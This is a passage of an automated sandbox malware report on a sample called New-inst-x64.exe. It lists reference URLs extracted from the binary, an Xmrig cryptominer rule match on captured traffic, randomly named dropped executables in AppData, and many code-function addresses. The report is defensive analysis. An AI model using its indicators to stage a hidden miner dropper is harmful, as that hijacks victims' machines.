      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000003.1175991867.0000000009A46000.00000004.00000020.00020000.00000000.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://heycam.github.io/webidl/#es-iterators
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000003.1175991867.0000000009A46000.00000004.00000020.00020000.00000000.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://heycam.github.io/webidl/#es-namespaces
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000003.1175991867.0000000009A46000.00000004.00000020.00020000.00000000.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://heycam.github.io/webidl/#es-operations
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000003.1175991867.0000000009A46000.00000004.00000020.00020000.00000000.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://heycam.github.io/webidl/#es-stringifier
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000003.1175991867.0000000009A46000.00000004.00000020.00020000.00000000.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://html.spec.whatwg.org/multipage/browsers.html#ascii-serialisation-of-an-origin
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000003.1175991867.0000000009A46000.00000004.00000020.00020000.00000000.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://html.spec.whatwg.org/multipage/browsers.html#concept-origin-opaque
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000003.1175991867.0000000009A46000.00000004.00000020.00020000.00000000.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://html.spec.whatwg.org/multipage/timers-and-user-prompts.html#dom-setinterval
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000003.1175991867.0000000009A46000.00000004.00000020.00020000.00000000.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://html.spec.whatwg.org/multipage/webappapis.html#windoworworkerglobalscope
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000003.1175991867.0000000009A46000.00000004.00000020.00020000.00000000.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://infra.spec.whatwg.org/#ascii-whitespace
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000003.1175991867.0000000009A46000.00000004.00000020.00020000.00000000.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://infra.spec.whatwg.org/#forgiving-base64
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000003.1175991867.0000000009A46000.00000004.00000020.00020000.00000000.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://infra.spec.whatwg.org/#forgiving-base64-decode
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://invisible-island.net/ncurses/terminfo.ti.html#toc-_Specials
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://invisible-island.net/xterm/ctlseqs/ctlseqs.html
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://jimmy.warting.se/opensource
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://linux.die.net/man/1/dircolors).
      Source: New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://mathiasbynens.be/notes/javascript-encoding
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://no-color.org/
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://nodejs.org/
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000003.1175991867.0000000009A46000.00000004.00000020.00020000.00000000.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://nodejs.org/api/cli.html#cli_unhandled_rejections_mode).
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000003.1175991867.0000000009A46000.00000004.00000020.00020000.00000000.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://nodejs.org/api/fs.html
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://nodejs.org/api/fs.html#fs_stat_time_values)
      Source: New-inst-x64.exe, 00000000.00000003.1175991867.0000000009A46000.00000004.00000020.00020000.00000000.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://nodejs.org/download/release/v16.20.2/node-v16.20.2-headers.tar.gz
      Source: New-inst-x64.exe, 00000000.00000003.1175991867.0000000009A46000.00000004.00000020.00020000.00000000.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://nodejs.org/download/release/v16.20.2/node-v16.20.2.tar.gz
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://nodejs.org/download/release/v16.20.2/node-v16.20.2.tar.gzhttps://nodejs.org/download/release
      Source: New-inst-x64.exe, 00000000.00000003.1175991867.0000000009A46000.00000004.00000020.00020000.00000000.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://nodejs.org/download/release/v16.20.2/win-x86/node.lib
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://nodejs.org/en/docs/inspector
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://nodejs.org/en/docs/inspectorFor
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://nodejs.org/static/images/favicons/favicon.ico
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://nodejs.org/static/images/favicons/favicon.iconodedevtoolsFrontendUrldevtoolsFrontendUrlCompa
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000003.1175991867.0000000009A46000.00000004.00000020.00020000.00000000.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://pubs.opengroup.org/onlinepubs/9699919799/basedefs/V1_chap12.html
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000003.1175991867.0000000009A46000.00000004.00000020.00020000.00000000.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://pubs.opengroup.org/onlinepubs/9699919799/basedefs/V1_chap12.html).
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://sourcemaps.info/spec.html
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://stackoverflow.com/a/5501711/3561
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000003.1175991867.0000000009A46000.00000004.00000020.00020000.00000000.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://tc39.es/ecma262/#sec-%typedarray%-intrinsic-object
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000003.1175991867.0000000009A46000.00000004.00000020.00020000.00000000.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://tc39.es/ecma262/#sec-IsHTMLDDA-internal-slot
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000003.1175991867.0000000009A46000.00000004.00000020.00020000.00000000.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://tc39.github.io/ecma262/#sec-%iteratorprototype%-object
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000003.1175991867.0000000009A46000.00000004.00000020.00020000.00000000.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://tc39.github.io/ecma262/#sec-%typedarray%.of
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://tc39.github.io/ecma262/#sec-object.prototype.tostring
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc2397#section-2
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc3492#section-3.4
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc3986#section-3.2.2
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc6455#section-1.3
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc7230#section-3.2.2
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc7230#section-3.2.6
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc7540#section-8.1.2.5
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000003.1175991867.0000000009A46000.00000004.00000020.00020000.00000000.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://url.spec.whatwg.org/#cannot-have-a-username-password-port

      System Summary

      Source: dump.pcap, type: PCAP Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
      Source: xctyuuxnvcrcuez.exe.0.dr Static PE information: section name:
      Source: xctyuuxnvcrcuez.exe.0.dr Static PE information: section name:
      Source: xctyuuxnvcrcuez.exe.0.dr Static PE information: section name:
      Source: xctyuuxnvcrcuez.exe.0.dr Static PE information: section name:
      Source: ztrucvcctzwerxc.exe.0.dr Static PE information: section name:
      Source: ztrucvcctzwerxc.exe.0.dr Static PE information: section name:
      Source: ztrucvcctzwerxc.exe.0.dr Static PE information: section name:
      Source: ztrucvcctzwerxc.exe.0.dr Static PE information: section name:
      Source: ztrucvcctzwerxc.exe.0.dr Static PE information: section name:
      Source: ztrucvcctzwerxc.exe.0.dr Static PE information: section name:
      Source: C:\Windows\System32\svchost.exe File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 28_2_003F9AF628_2_003F9AF6
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 28_2_00413A9028_2_00413A90
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 28_2_00407AA028_2_00407AA0
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 28_2_00428AA028_2_00428AA0
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 28_2_00457AB028_2_00457AB0
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 28_2_0043EB4028_2_0043EB40
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 28_2_00407B5028_2_00407B50
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 28_2_003FCB0F28_2_003FCB0F
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 28_2_0041ABF028_2_0041ABF0
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 28_2_0042ABF028_2_0042ABF0
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 28_2_0040DB8028_2_0040DB80
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 28_2_00400B9028_2_00400B90
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 28_2_00401BA028_2_00401BA0
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 28_2_00447BB028_2_00447BB0
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 28_2_00423C7028_2_00423C70
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 28_2_00412C0028_2_00412C00
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 28_2_00451C0028_2_00451C00
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 28_2_00404C1028_2_00404C10
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 28_2_003F9D3028_2_003F9D30
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 28_2_00453D6028_2_00453D60
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 28_2_00419D0028_2_00419D00
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 28_2_0044FD0028_2_0044FD00
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 28_2_0042FD2028_2_0042FD20
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 28_2_00427DD028_2_00427DD0
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 28_2_0042DDD928_2_0042DDD9
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 28_2_00400DE028_2_00400DE0
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 28_2_00437DF028_2_00437DF0
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 28_2_00412D8028_2_00412D80
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 28_2_0042DD8028_2_0042DD80
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 28_2_003F5DF628_2_003F5DF6
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 28_2_003F8DD028_2_003F8DD0
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 28_2_00410E1028_2_00410E10
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 28_2_00457E1028_2_00457E10
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 28_2_003FDE6028_2_003FDE60
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 28_2_0041FE2028_2_0041FE20
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 28_2_0042AEC028_2_0042AEC0
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 28_2_0043AEE028_2_0043AEE0
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 28_2_00432E8028_2_00432E80
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 28_2_0044AE8028_2_0044AE80
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 28_2_00433EA028_2_00433EA0
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 28_2_00415EB028_2_00415EB0
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 28_2_003FBF1028_2_003FBF10
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 28_2_00412F1028_2_00412F10
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 28_2_0044EF1028_2_0044EF10
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 28_2_00403F2028_2_00403F20
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 28_2_00416FC028_2_00416FC0
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 28_2_00442FC028_2_00442FC0
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 28_2_00436F9028_2_00436F90
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 28_2_0044FF9028_2_0044FF90
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_0040384029_2_00403840
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_003FE03029_2_003FE030
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_0040F86029_2_0040F860
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_0042C87029_2_0042C870
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_0042D07029_2_0042D070
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_003F100029_2_003F1000
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_0045280029_2_00452800
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_0040D81029_2_0040D810
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_0042A81029_2_0042A810
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_0044601029_2_00446010
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_0041E02029_2_0041E020
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_004128C029_2_004128C0
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_004050E029_2_004050E0
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_004100E029_2_004100E0
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_003FC89029_2_003FC890
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_0040A0F029_2_0040A0F0
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_004490F029_2_004490F0
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_0045B0F029_2_0045B0F0
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_0043609029_2_00436090
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_004198A029_2_004198A0
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_004378A029_2_004378A0
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_004498B029_2_004498B0
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_0040694029_2_00406940
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_0040915029_2_00409150
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_0042717029_2_00427170
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_0040E90029_2_0040E900
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_0042890029_2_00428900
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_0045D90A29_2_0045D90A
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_0042011029_2_00420110
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_0044411029_2_00444110
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_003FB96029_2_003FB960
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_0044692029_2_00446920
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_0042813029_2_00428130
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_0042E9C029_2_0042E9C0
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_004541D029_2_004541D0
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_003F899029_2_003F8990
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_0040F19029_2_0040F190
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_003FD1E029_2_003FD1E0
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_004001A029_2_004001A0
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_004089A029_2_004089A0
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_003F41D029_2_003F41D0
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_00423A5029_2_00423A50
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_00438A7029_2_00438A70
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_0041320029_2_00413200
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_00441A0029_2_00441A00
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_0045221029_2_00452210
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_00453A2029_2_00453A20
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_0046823029_2_00468230
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_003F724029_2_003F7240
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_004622CA29_2_004622CA
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_004222F029_2_004222F0
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_00413A9029_2_00413A90
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_0041529029_2_00415290
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_00407AA029_2_00407AA0
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_00428AA029_2_00428AA0
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_004082B029_2_004082B0
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_004512B029_2_004512B0
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_00457AB029_2_00457AB0
